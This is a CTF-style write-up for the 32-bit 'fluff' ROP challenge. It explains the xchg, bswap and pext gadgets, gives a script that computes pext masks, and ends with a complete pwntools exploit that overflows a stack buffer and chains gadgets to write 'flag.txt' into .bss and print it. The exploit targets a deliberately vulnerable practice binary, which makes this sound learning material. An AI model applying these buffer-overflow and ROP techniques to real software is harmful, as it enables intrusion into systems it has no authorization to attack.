If you already know these few assembly instructions, this challenge is actually fairly simple. From the gadget-usage part of the problem I learned xchg, bswap and pext; I solved it on my own and was very happy o( ̄▽ ̄ )ブ.
```
// ecx: address where "flag.txt" gets written, one byte at a time
0x08048558 : pop ecx ; bswap ecx ; ret
0x08048555 : xchg byte ptr [ecx], dl ; ret
```
xchg: the operation pseudocode below is quoted from https://www.felixcloutier.com/x86/xchg

```
TEMP := DEST;
DEST := SRC;
SRC := TEMP;
```
bswap converts between big-endian and little-endian byte order:

```
TEMP := DEST
IF 64-bit mode AND OperandSize = 64
THEN
    DEST[7:0] := TEMP[63:56];
    DEST[15:8] := TEMP[55:48];
    DEST[23:16] := TEMP[47:40];
    DEST[31:24] := TEMP[39:32];
    DEST[39:32] := TEMP[31:24];
    DEST[47:40] := TEMP[23:16];
    DEST[55:48] := TEMP[15:8];
    DEST[63:56] := TEMP[7:0];
ELSE
    DEST[7:0] := TEMP[31:24];
    DEST[15:8] := TEMP[23:16];
    DEST[23:16] := TEMP[15:8];
    DEST[31:24] := TEMP[7:0];
FI;
```
To set edx through pext (the mask comes from eax, which is loaded from ebp; the source is the constant 0xb0bababa):

```
0x08048543 89e8         mov eax, ebp
0x08048545 bbbababab0   mov ebx, 0xb0bababa
0x0804854a c4e262f5d0   pext edx, ebx, eax
```
I wrote a script for it; computing the pext mask for edx by hand felt a bit dim-witted.

```python
# Source bits of 0xb0bababa, reversed so that a[j] is bit j (LSB first)
a = "10110000101110101011101010111010"[::-1]
flag = "flag.txt"
c = []
for l in flag:
    j = 0
    b = ""
    # bits of the target character, LSB first; bin() drops leading zeros,
    # so only the bits up to the highest set bit are extracted and pext's
    # zero fill supplies the rest
    flagbin = str(bin(ord(l)))[2:][::-1]
    for i in range(len(flagbin)):
        # skip source bits that do not match; each skipped bit gets mask 0
        while j < len(a) and flagbin[i] != a[j]:
            j += 1
            b += "0"
        # matching source bit: select it in the mask
        b += "1"
        j += 1
    # mask string was built LSB first, reverse it before converting
    c.append(hex(int(b[::-1], 2)))
print(c)
```
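The block below is an added example, not code from the original writeup: software models of 32-bit bswap and pext written from the operation pseudocode above, plus the same greedy mask search the script performs, with every mask checked against the pext model before it is accepted. The source constant 0xb0bababa and the .bss address 0x0804a020 are the ones in the gadget listing and exploit; the function names are my own. It generalizes the script slightly: it accepts any source value and raises an error when the source runs out of bits of the needed value, which is the failure mode the greedy search has.

```python
# Added example (not part of the original writeup): models of the BSWAP and
# PEXT instructions used by the gadget chain, and the greedy mask search.

MASK32 = 0xFFFFFFFF


def bswap32(value: int) -> int:
    """Model of 32-bit BSWAP: reverse the byte order of a dword."""
    value &= MASK32
    return int.from_bytes(value.to_bytes(4, "little"), "big")


def pext32(src: int, mask: int) -> int:
    """Model of PEXT r32: gather the bits of src selected by mask (scanning
    from bit 0 upward) into the low bits of the result; the rest is zero."""
    result = 0
    out_pos = 0
    for bit in range(32):
        if (mask >> bit) & 1:
            result |= ((src >> bit) & 1) << out_pos
            out_pos += 1
    return result


def find_pext_mask(target: int, src: int = 0xB0BABABA) -> int:
    """Greedy search for a mask with pext32(src, mask) == target.

    Walks src from bit 0 upward and selects one source bit per target bit.
    Only target.bit_length() bits are extracted; bits above that are left to
    PEXT's zero fill, which is why the writeup's masks cover 7 bits for ASCII.
    Raises ValueError when src has no remaining bit of the needed value.
    """
    mask = 0
    j = 0
    for i in range(target.bit_length()):
        want = (target >> i) & 1
        while j < 32 and ((src >> j) & 1) != want:
            j += 1
        if j == 32:
            raise ValueError(f"source has no bit {want} left for target bit {i}")
        mask |= 1 << j
        j += 1
    return mask


def masks_for_string(text: str, src: int = 0xB0BABABA) -> list:
    """One mask per character, each verified against the pext model."""
    masks = []
    for ch in text:
        m = find_pext_mask(ord(ch), src)
        if pext32(src, m) != ord(ch):
            raise AssertionError(f"mask {m:#x} does not reproduce {ch!r}")
        masks.append(m)
    return masks


def big_endian_image(addr: int) -> int:
    """Value to pop into ecx so that 'bswap ecx' yields addr (the reason the
    exploit packs the .bss address big-endian)."""
    return int.from_bytes(addr.to_bytes(4, "big"), "little")


if __name__ == "__main__":
    # "flag.txt" is the filename the chain writes into .bss byte by byte.
    print([hex(m) for m in masks_for_string("flag.txt")])
    bss = 0x0804A020  # .bss address from the writeup
    image = big_endian_image(bss)
    print(hex(image), "->", hex(bswap32(image)))
```

Running it prints the same eight masks that appear in the exploit's flag list, and shows that bswap applied to the big-endian image of 0x0804a020 gives the address back.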
The exploit is as follows:

```python
from pwn import *

context(terminal=['tmux', 'new-window'])
p = gdb.debug('./fluff32', "b pwnme")
context.bits = 32

# padding up to the saved return address
c = b'A' * 44
data = 0x0804a018
bss = 0x0804a020
# pext masks for "flag.txt", one per character (computed by the script above)
flag = [p32(0xb4b),
        p32(0x2dd),
        p32(0x1d46),
        p32(0xb5a),
        p32(0xdb),
        p32(0xacd),
        p32(0x1ac5),
        p32(0xacd)]

pop_ebp = 0x080485bb
pext_edx = 0x08048543            # mov eax, ebp ; mov ebx, 0xb0bababa ; pext edx, ebx, eax
pop_ecx_bswap_ecx = 0x08048558   # pop ecx ; bswap ecx ; ret
xchg_bytecx_dl = 0x08048555      # xchg byte ptr [ecx], dl ; ret
ret = p32(0x08048382)
print_file = 0x080483d0

payload = c
for i in range(len(flag)):
    # ebp <- mask, then pext puts the wanted character in edx (dl)
    payload += p32(pop_ebp) + flag[i]
    payload += p32(pext_edx)
    # ecx <- bss+i; the address is packed big-endian because bswap reverses it
    payload += p32(pop_ecx_bswap_ecx) + pack(bss + i, endian="big")
    # write dl to [ecx]
    payload += p32(xchg_bytecx_dl)

# print_file("flag.txt") with the string now sitting in .bss
payload += p32(print_file) + p32(0x0) + p32(bss)

print(payload)
p.sendline(payload)
p.interactive()
```